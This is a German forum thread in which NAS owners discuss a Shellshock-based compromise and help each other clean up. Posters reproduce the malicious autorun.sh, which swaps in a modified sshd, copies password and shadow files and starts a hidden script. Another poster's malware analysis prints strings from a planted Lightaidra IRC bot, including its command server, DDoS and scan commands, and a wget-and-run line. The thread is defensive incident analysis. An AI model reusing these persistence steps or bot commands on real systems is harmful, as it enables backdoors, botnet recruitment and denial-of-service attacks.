Ich habe meine daten nun noch auf einer weiteren platte gesichert.
Wie kann ich denn als unerfahrener die autorun vorher löschen? Wo finde ich sie denn genau?
Ich habe meine daten nun noch auf einer weiteren platte gesichert.
Wie kann ich denn als unerfahrener die autorun vorher löschen? Wo finde ich sie denn genau?
Zitat von "bladekiller"Hätte das hier auch funktioniert
Nein! Das ist ein anderer Exploit.
Hallo zusammen,
ich hatte anfang der Woche auch das problem. Komischerweise aber nur Sporadisch. Einmal habe ich den Prozess pnscan gesehen danach nicht mehr. Ich habe eben mal meine Autorun.sh ausgelsen.
Hier das Ergebniss:
/share/MD0_DATA/optware/.xpl/.cgi
cp /share/MD0_DATA/optware/.xpl/.exo.cgi /home/httpd/cgi-bin/exo.cgi
sleep 30 && cp -f /opt/sbin/sshd /usr/sbin/sshd && /opt/etc/openssh/sshd_config /etc/ssh/sshd_config && /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26 &
sleep 200 && sh /share/MD0_DATA/optware/.xpl/run &
cp /etc/resolv.conf /share/MD0_DATA/optware/etc
cp /etc/hostname /share/MD0_DATA/optware/etc
cp /etc/TZ /share/MD0_DATA/optware/etc
cp /etc/config/passwd /etc/config/group /etc/config/shadow /share/MD0_DATA/optware/etc
rm -rf /opt
ln -sf /share/MD0_DATA/optware/opt /opt
mount -o bind /dev /share/MD0_DATA/optware/dev
mount -o bind /proc /share/MD0_DATA/optware/proc
mount -o bind /proc/bus/usb /share/MD0_DATA/optware/proc/bus/usb
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qmultimedia
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qdownload
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qusb
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qweb
"autorun.sh" 22 lines, 1300 characters
Alles anzeigen
Richtig blöde frage bin ich auch betroffen? Wollte morgen neu Aufsetzen. BIn noch daten am Sichern.
Vielen Dank und viele Grüße
FC
Ja, du bist betroffen
Alles was in optware/.xpl drinnen liegt.
Hier mal eine "Shellshock Testseite"
Sämtliche Exploits 1-7 ergeben bei Firm 4.1.1 eine "nicht angreifbar" der letzte ... allerdings als Ausgabe eine
Segmentation fault
vulanrable
was nach meinen Shell-Kentnissen auch OK ist, also der erst Anteil des Befehls vor den Pipes gibt das Seg-Fault... hat also nicht funktioniert .... richtig ??
Ok alles klar danke
Zitat von "Smile99"Ja, du bist betroffen
Alles was in optware/.xpl drinnen liegt.
Hallo ich bin es nochmal
Nach gestrigem Formatieren der Platten heute Nas-Recovery und dann Firmware Recovery dann jetzt dieser Eintrag in der Easybox.
Da war das Nas gerade einmal erst ein paar Minuten am Netz..
12/13/2014 19:35:50 **Smurf** 221.223.47.0->> 192.168.2.9, Type:3, Code:3 (from PPPoE1 Inbound)
Woher weiss jemand das das Nas nun die 192.168.2.9 hat.
Habe ich noch immer das Teil drauf?
Hast du noch eine Portweiterleitung in deinem Router?
Ansonsten gibt es aus dem Internet kein Zugriff auf die Geräte in deinem Netzwerk.
Nein der Router hat keine einzige Portweiterleitung. Zumal er auch eine neue IP bekommen hat. von 10 auf 9.
Auch UPnP am Router ist aus.
ich habe heute die Firmware Recovery gemacht und alles neu Aufegesetzt bis jetzt keine anzeichen für pnscan etc...
flower1978
Ist auch kein DMZ in dem Router aktiviert?
Nein DMZ ist aus. Es könnte aber evtl. auch von der automatischen Uhrzeit einstellung gekommen sein. Ansonsten habe ich leider keine erklärung.
Ich werde mich dem aufspielen der Daten daher noch einen Tag warten, und schauen, was so passiert. Gibt es eine Möglichkeit im NAS sämtliche Ein- und Ausgämge zu protokolieren?
Unter Systemsteuerung->Systemprotokolle
Dort kannst du die Systemverbindungprotokolle aufzeichnen lassen.
Zitat von "Drauka"
hallo drauka,
vom qnap-techniker nie eine antwort bekommen....wurst.
wichtiger: wie schon von anderen angesprochen wurde, auch vom dr. mike im englischen forum, ist die rede ständig von der autorun.sh datei. aber mir wurde nie geanwortet, ob es NUR um diese datei geht????
d.h.....vielleicht wurde andere teile des fw-codes korruptiert - oder habe ich was verpasst bzw. überlesen.
gruss vorwärts,
manfred
Zitat von "MRudy"oder habe ich was verpasst bzw. überlesen.
Davon gehe ich mal aus.
Zitat von "MRudy"auch vom dr. mike im englischen forum,
Glaube ich nicht. Ich habe nur hier darüber geschrieben.
Zitat von "MRudy"d.h.....vielleicht wurde andere teile des fw-codes korruptiert
Jup, so ist es.
- es wird eine Ordnerstruktur /share/MD0_DATA/optware angelegt.
/share/MD0_DATA/optware//share/MD0_DATA/optware/.xpl//share/MD0_DATA/optware/.xpl/.cgi.1/share/MD0_DATA/optware/.xpl/run/share/MD0_DATA/optware/.xpl/.cgi.3/share/MD0_DATA/optware/.xpl/armgH.cgi/share/MD0_DATA/optware/.xpl/.cgi.4/share/MD0_DATA/optware/.xpl/.cgi.2/share/MD0_DATA/optware/.xpl/.cgi/share/MD0_DATA/optware/.xpl/.exo.cgi/share/MD0_DATA/optware/opt//share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.2/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.13/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.1/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.3/share/MD0_DATA/optware/opt/libexec//share/MD0_DATA/optware/opt/libexec/ssh-pkcs11-helper/share/MD0_DATA/optware/opt/libexec/ssh-keysign/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.4/share/MD0_DATA/optware/opt/share//share/MD0_DATA/optware/opt/share/openssl//share/MD0_DATA/optware/opt/share/openssl/openssl.cnf/share/MD0_DATA/optware/opt/share/ipkg//share/MD0_DATA/optware/opt/share/ipkg/intercept//share/MD0_DATA/optware/opt/share/ipkg/intercept/update-modules/share/MD0_DATA/optware/opt/share/ipkg/intercept/depmod/share/MD0_DATA/optware/opt/share/ipkg/intercept/ldconfig/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.8/share/MD0_DATA/optware/opt/lib//share/MD0_DATA/optware/opt/lib/libipkg.so/share/MD0_DATA/optware/opt/lib/libcrypto.so.0.9.7/share/MD0_DATA/optware/opt/lib/libz.so.1/share/MD0_DATA/optware/opt/lib/libz.so/share/MD0_DATA/optware/opt/lib/libcrypto.so.0/share/MD0_DATA/optware/opt/lib/libcrypto.so/share/MD0_DATA/optware/opt/lib/libz.so.1.2.5/share/MD0_DATA/optware/opt/lib/libssl.so/share/MD0_DATA/optware/opt/lib/libipkg.so.0/share/MD0_DATA/optware/opt/lib/libssl.so.0.9.7/share/MD0_DATA/optware/opt/lib/libssl.so.0/share/MD0_DATA/optware/opt/lib/ipkg//share/MD0_DATA/optware/opt/lib/ipkg/lists//share/MD0_DATA/optware/opt/lib/ipkg/lists/cs05q3armel/share/MD0_DATA/optware/opt/lib/ipkg/info//share/MD0_DATA/optware/opt/lib/ipkg/info/zlib.control/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.postinst/share/MD0_DATA/optware/opt/lib/ipkg/info/zlib.list/share/MD0_DATA/optware/opt/lib/ipkg/info/openssl.control/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.list/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.conffiles/share/MD0_DATA/optware/opt/lib/ipkg/info/openssl.list/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.prerm/share/MD0_DATA/optware/opt/lib/ipkg/info/openssl.conffiles/share/MD0_DATA/optware/opt/lib/ipkg/info/openssh.control/share/MD0_DATA/optware/opt/lib/ipkg/alternatives//share/MD0_DATA/optware/opt/lib/ipkg/alternatives/scp/share/MD0_DATA/optware/opt/lib/ipkg/alternatives/ssh/share/MD0_DATA/optware/opt/lib/libipkg.so.0.0.0/share/MD0_DATA/optware/opt/var//share/MD0_DATA/optware/opt/var/run//share/MD0_DATA/optware/opt/var/empty//share/MD0_DATA/optware/opt/ipkg-xJfCkD//share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.11/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.7/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.5/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.12/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.9/share/MD0_DATA/optware/opt/nasconfig_fs.img.tgz/share/MD0_DATA/optware/opt/etc//share/MD0_DATA/optware/opt/etc/default//share/MD0_DATA/optware/opt/etc/default/openssh/share/MD0_DATA/optware/opt/etc/ipkg.conf/share/MD0_DATA/optware/opt/etc/openssh//share/MD0_DATA/optware/opt/etc/openssh/ssh_config/share/MD0_DATA/optware/opt/etc/openssh/moduli/share/MD0_DATA/optware/opt/etc/openssh/sshd_config/share/MD0_DATA/optware/opt/etc/init.d//share/MD0_DATA/optware/opt/etc/init.d/S40sshd/share/MD0_DATA/optware/opt/sbin//share/MD0_DATA/optware/opt/sbin/sshd/share/MD0_DATA/optware/opt/bin//share/MD0_DATA/optware/opt/bin/slogin/share/MD0_DATA/optware/opt/bin/ssh-keygen/share/MD0_DATA/optware/opt/bin/openssl/share/MD0_DATA/optware/opt/bin/ssh-add/share/MD0_DATA/optware/opt/bin/openssh-scp/share/MD0_DATA/optware/opt/bin/ipkg-opt/share/MD0_DATA/optware/opt/bin/update-alternatives/share/MD0_DATA/optware/opt/bin/scp/share/MD0_DATA/optware/opt/bin/ssh-agent/share/MD0_DATA/optware/opt/bin/openssh-ssh/share/MD0_DATA/optware/opt/bin/sftp/share/MD0_DATA/optware/opt/bin/ipkg/share/MD0_DATA/optware/opt/bin/ssh-keyscan/share/MD0_DATA/optware/opt/bin/ssh/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk/share/MD0_DATA/optware/opt/include//share/MD0_DATA/optware/opt/include/zconf.h/share/MD0_DATA/optware/opt/include/zlib.h/share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.10/share/MD0_DATA/optware/opt/ipkg-2PtqiL//share/MD0_DATA/optware/opt/ipkg-opt_0.99.163-10_arm.ipk.6/share/MD0_DATA/optware/etc/share/MD0_DATA/optware/ipkglib//share/MD0_DATA/optware/ipkglib/ipkglib
- es wird eine Datei ipkg in /usr/bin angelegt
- es wird die originale sshd durch eine modifizierte in /usr/sbin ausgetauscht.
Original
Modifiziert
- es wird ein neuer User 'request' in /etc/config/passwd und /etc/config/shadow angelegt
passwd
shadow
- es wird eine Datei exo.cgi aus der Optwarestruktur nach /home/httpd/cgi-bin/ kopiert
Lesbarer Text in dieser Datei:
[MS]
0ab1cd2ef3gh4il5mn6op7qr8st9uvz_wyjkx
irc.pollo.org
192.79.153.207:6667
/var/run/.lightpid
#aidra
NICK %s
USER pwn localhost localhost :Lightaidra ;)
TOPIC %s
NICK %s
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process
PRIVMSG %s :* *** EOF
Aidra?!
QUIT :pwn!
synflood packeting %s:%u (secs: %u)
PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).
ngsynflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).
ackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).
ngackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).
/var/run/.lightscan
PRIVMSG %s :[error] unable to open: %s
QUOTE ZOMBIE
%s.%s.%d.%d
%16s
POST /cgi-bin/firmwarecfg HTTP/1.1
Host: $IP
password>
password
root
rm -rf /var/run/getbinaries.sh; wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&
PRIVMSG %s :[nsynflood] packeting completed!
QUOTE ZOMBIE
PRIVMSG %s :[ngsynflood] packeting completed!
PRIVMSG %s :[ackflood] packeting completed!
PRIVMSG %s :[ngackflood] packeting completed!
0.9.30
/bin/sh
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
+0-#'I
!''-N.Y]Z
#$%&'()*+,234567
;<=>?@ABCDEFGJIMOPQRSTUVWX[abcxyz{|}~
Unknown error
Success
Cannot register service
xdr_array: out of memory
0123456789abcdef
/etc/hosts
/etc/config/hosts
%s%s%m
RPC: (unknown error code)
3.09
Alles anzeigen
Das sind die Dinge, die ich bisher herausfinden konnte. Vermutlich ist das noch nicht alles.
Respekt - tolle Analyse :thumb:
Vielen Dank dr_mike! :thumb:
Menno, du hast echt was drauf.
Da hast du dir aber echt viel arbeit gemacht.....